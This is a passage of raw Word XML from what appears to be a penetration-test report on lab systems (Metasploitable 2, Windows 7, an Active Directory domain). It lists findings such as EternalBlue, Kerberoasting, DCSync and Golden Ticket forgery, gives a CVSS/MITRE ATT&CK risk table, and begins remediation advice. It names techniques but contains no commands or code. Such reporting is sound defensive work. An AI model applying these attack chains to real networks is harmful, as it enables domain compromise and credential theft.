        <w:spacing w:before="43"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:bookmarkStart w:name="Privilege Escalation:" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> Escalation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="98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LinPEAS/LSE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identified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30+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privilege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escalation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vectors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Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="9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nmap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SUID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binary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escape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provided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root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shell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Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="10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EternalBlue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(MS17-010)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exploited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Windows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7-NT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AUTHORITY\SYSTEM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obtained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2145" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="19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Multiple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persistence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mechanisms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established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both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platforms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Enumeration: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218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PowerView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enumerated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domain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users,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computers,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groups,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GPOs.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10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BloodHound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identified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multiple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shortest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paths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Domain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Admin.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14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AS-REP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Roasting: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accounts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pre-auth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disabled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found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hashes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extracted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offine.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10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Kerberoasting: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service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accounts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weak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passwords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successfully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cracked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="265"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Dominance: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268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LLMNR/Responder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poisoning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captured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NTLMv2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hashes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domain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users.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9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ACL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misconfiguration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abused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grant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DCSync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rights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attacker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account.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15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DCSync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replicated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entire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NTDS.dit-all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domain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NTLM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hashes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extracted.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9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KRBTGT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hash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extracted-Golden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Tickets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forged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unlimited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domain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access.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9" w:after="0"/>
        <w:ind w:left="1440" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Multiple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persistence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mechanisms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survive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password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resets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standard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remediation.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pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Rating:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="30"/>
        <w:rPr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6"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1530"/>
        <w:gridCol w:w="4406"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="560" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2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CVSS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pacing w:val="-4"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="2"/>
              <w:ind w:lef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MITRE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i/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ATT&amp;CK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:spacing w:val="-11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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1035" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="211"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Backdoor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(CVE2011-2523)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10.0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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1190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Exploit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Public-Facing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="770" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:ind w:right="162"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Samba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Usermap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RCE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(CVE2007-2447)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10.0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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1190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Exploit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Public-Facing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="770" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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LLMNR/NBT-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="21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Poisoning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8.8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4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1557.001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LLMNR/NBT-NS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Poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1035" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="913"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NTLM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Hash </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Extraction</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="242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(Kiwi/Mimikatz)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8.5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4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1003.001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LSASS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Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="505" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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AS-REP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Roasting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7.5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4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1558.004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AS-REP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Roasting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="510" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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Kerberoasting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7.5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4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1558.003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Kerberoasting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="505" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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DCSync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Attack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9.0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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1003.006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DCSync</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="772" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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1" w:lineRule="auto"/>
              <w:ind w:right="211"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Golden Ticket </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(KRBTGT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hash)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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406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11"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1558.001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Golden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Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="767" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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1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ACL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Abuse</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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(GenericWrite)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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1" w:lineRule="exact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8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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1" w:lineRule="exac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44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1" w:lineRule="exact"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1484.001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Group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Policy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="505" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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Pass-the-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hash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8.1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4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1550.002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Pass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Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="775" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="351"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EternalBlue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MS17-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>010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9.8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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1210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Exploitation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Remote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Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="505" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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SSH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Key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Persistence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7.2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4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1098.004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SSH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Authorized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Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="770" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto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Scheduled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Task Persistence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7.2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4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1053.005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Scheduled </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="770" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="757"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Web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LFI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(file= </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>parameter)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7.3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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1083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File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and Directory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Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="775" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261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RCE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via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cmd= </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>parameter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9.8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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4406" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:left="111" w:right="766"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>T1059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—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Command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Scripting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:after="0" w:line="261" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Solutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="276"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pP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remediation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommendations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prioritized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>risk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represent strategic, long-term solutions not temporary patches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Priority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>CRITICAL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto" w:before="213" w:after="0"/>
        <w:ind w:left="2161" w:right="1871" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Decommission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immediately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patch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vsftpd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2.3.4,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UnrealIRCd,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Samba 3.0.20-replace with supported versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2161" w:right="1904" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Disable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LLMNR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NBT-NS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via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Group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across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entire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domain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(no legitimate use case remains).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2161" w:right="1407" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rotate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KRBTGT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password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TWICE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immediately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invalidate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existing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Golden </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tickets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2161" w:right="1324" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Patch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MS17-010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(EternalBlue)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Windows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systems —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has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been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publicly exploitable since 2017.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2161" w:val="left" w:leader="none"/>
        </w:tabs>
